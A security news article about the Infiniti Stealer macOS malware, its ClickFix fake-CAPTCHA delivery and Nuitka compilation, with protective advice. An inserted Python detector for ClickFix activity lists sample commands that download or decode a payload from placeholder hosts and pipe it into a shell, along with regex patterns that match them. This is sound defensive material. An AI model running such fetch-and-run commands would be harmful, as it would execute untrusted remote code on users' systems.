Infiniti Stealer: macOS Malware Uses ClickFix and Nuitka Compilation
A new macOS infostealer combines ClickFix social engineering with Nuitka-compiled Python to evade detection. First documented campaign pairing these techniques.
A previously undocumented macOS infostealer dubbed Infiniti Stealer has surfaced, combining ClickFix social engineering with Nuitka-compiled Python to create a payload that's both effective at tricking users and difficult to analyze. Malwarebytes Labs researchers, who initially tracked the malware as "NukeChain," identified it as the first documented macOS campaign pairing these two techniques.
The ClickFix Delivery Mechanism
Infiniti Stealer doesn't exploit software vulnerabilities. Instead, it relies on ClickFix, a social engineering technique that tricks users into executing malicious commands themselves.
The attack presents victims with a fake CAPTCHA verification page. Rather than the standard "click the images with traffic lights" challenge, the page instructs users to open Terminal and paste a command to "verify" they're human. The command downloads and executes the Infiniti Stealer payload.
This approach is devastatingly effective because it bypasses macOS security controls that would block unsigned applications downloaded from the internet. When users manually execute commands in Terminal, they're granting explicit permission for whatever happens next. Gatekeeper doesn't intervene because the user initiated the action.
ClickFix has become increasingly popular across platforms. We've seen it deployed in the PureLog Stealer campaigns targeting healthcare organizations and the Torg Grabber infections stealing cryptocurrency wallet credentials. The technique works because users have been trained to complete verification steps without questioning them.
Why Nuitka Matters
The payload itself is written in Python but compiled using Nuitka, a tool that converts Python code into native C executables. This approach creates several advantages for attackers:
- Analysis complexity — Decompiling Nuitka binaries is significantly harder than reversing standard Python bytecode
- Detection evasion — The resulting executable doesn't match signatures for known Python malware
- Performance — Native code runs faster than interpreted Python
- Dependencies — No Python interpreter required on the target system
Traditional Python malware can often be deobfuscated by extracting and reading the .pyc bytecode files. Nuitka compilation removes that shortcut for defenders, forcing them into more time-intensive native binary analysis.
Microsoft documented similar Python-based infostealers targeting macOS in February, but those campaigns used standard Python execution rather than Nuitka compilation. Infiniti Stealer represents an evolution—attackers are learning from detection methods and adapting.
What Gets Stolen
While Malwarebytes confirmed Infiniti Stealer targets "sensitive data from Macs," the full capability list wasn't disclosed in their initial reporting. Based on similar macOS infostealers, likely targets include:
- Keychain passwords and certificates
- Browser credentials and cookies (Safari, Chrome, Firefox, Brave)
- Cryptocurrency wallet files and seed phrases
- SSH keys and cloud service credentials
- Messaging app databases (Telegram, Discord, Slack)
- Screenshots and clipboard contents
macOS users often assume they're immune to malware, making them particularly susceptible to social engineering. The platform's smaller market share means fewer attacks—but also means less user awareness about threats that do exist.
The Exposed Control Panel
In an operational security failure, the Infiniti Stealer control panel became publicly accessible before Malwarebytes published their findings. This exposed the malware's actual name (researchers had been tracking it as "NukeChain") and potentially revealed information about the operators.
Such exposures happen more often than attackers would like. Misconfigured servers, default credentials, and rushed deployments create windows where researchers—or competing criminals—can gather intelligence. The TetraLeaks incident earlier this year exposed a Vidar operation's full infrastructure through similar carelessness.
Protecting macOS Systems
For macOS users:
- Never paste commands from websites — Legitimate CAPTCHA verifications never require Terminal commands
- Keep Gatekeeper enabled — Don't disable macOS security features for convenience
- Use a password manager — Reduces reliance on browser-stored credentials that malware targets
- Enable FileVault — Full-disk encryption limits what attackers can access if they compromise your system
- Monitor for suspicious Terminal activity — EDR solutions increasingly flag unusual command-line execution patterns
Organizations managing Mac fleets should ensure endpoint detection covers ClickFix patterns. The technique will continue spreading because it works, and macOS-focused variants will keep emerging.
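As an added illustration (not code from Malwarebytes or the article), here is a small Python detector for the ClickFix execution shape described above: a download-or-decode one-liner that hands its output straight to an interpreter, spawned from an interactive terminal app. It runs over constructed JSON-lines process telemetry; the field names, the terminal app list and the placeholder hostnames are assumptions, not artefacts from the campaign.

```python
import json
import re

# Constructed sample endpoint telemetry, one process-start event per line.
# Hostnames are placeholders, not indicators from the article.
SAMPLE_EVENTS = """
{"pid": 501, "parent": "Terminal", "cmd": "curl -fsSL http://captcha.example.invalid/verify | bash"}
{"pid": 502, "parent": "Terminal", "cmd": "echo Y3VybCAuLi4= | base64 -d | sh"}
{"pid": 503, "parent": "Terminal", "cmd": "git status"}
{"pid": 504, "parent": "launchd", "cmd": "/usr/bin/curl -s https://updates.example.invalid/feed"}
{"pid": 505, "parent": "iTerm2", "cmd": "bash -c \\"$(curl -s http://x.example.invalid/setup)\\""}
""".strip()

# ClickFix is a human-initiated one-liner, so the parent process matters:
# the same curl spawned by launchd or a package manager is routine.
TERMINAL_APPS = {"Terminal", "iTerm2", "Warp", "Alacritty", "kitty"}  # assumed list

FETCH = r"\b(?:curl|wget)\b"
INTERP = r"\b(?:bash|sh|zsh|python3?|osascript)\b"

# Three shapes of "fetch or decode, then hand the result straight to an interpreter".
RULES = [
    ("download piped to interpreter",
     re.compile(FETCH + r"[^|]*\|\s*(?:sudo\s+)?" + INTERP)),
    ("base64-decoded payload piped to interpreter",
     re.compile(r"base64\s+(?:-d|-D|--decode)[^|]*\|\s*(?:sudo\s+)?" + INTERP)),
    ("fetched content executed via command substitution",
     re.compile(r"\$\(\s*" + FETCH)),
]


def classify(event: dict) -> list:
    """Names of every rule the event triggers; empty for non-terminal parents."""
    if event.get("parent") not in TERMINAL_APPS:
        return []
    return [name for name, rx in RULES if rx.search(event.get("cmd", ""))]


def detect_clickfix(lines) -> list:
    """Parse JSON-lines telemetry and return one alert per suspicious event."""
    alerts = []
    for line in lines:
        try:
            event = json.loads(line)
        except json.JSONDecodeError:
            continue  # blank or malformed telemetry line: skip, don't crash
        reasons = classify(event)
        if reasons:
            alerts.append({"pid": event["pid"], "parent": event["parent"],
                           "reasons": reasons, "cmd": event["cmd"]})
    return alerts
```

Running `detect_clickfix(SAMPLE_EVENTS.splitlines())` flags pids 501, 502 and 505 and leaves the routine `git status` and the launchd-spawned curl alone; in a real deployment the parent-process check is what keeps the rule from paging on every developer's shell history.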
The Cross-Platform Reality
Infiniti Stealer joins a growing ecosystem of macOS-targeted threats. The perception that "Macs don't get viruses" hasn't been true for years, but it persists in user behavior. Attackers know this, which is why ClickFix campaigns increasingly include macOS payloads alongside Windows variants.
The combination of social engineering and compiled Python creates a template other malware authors will copy. Expect more Nuitka-compiled macOS malware as attackers share techniques and tools. The first documented campaign rarely stays unique for long.
If you've recently completed a CAPTCHA that involved copying commands into Terminal, assume compromise. Check for unexpected processes, review recent network connections, and rotate credentials for any sensitive accounts accessed from the affected system.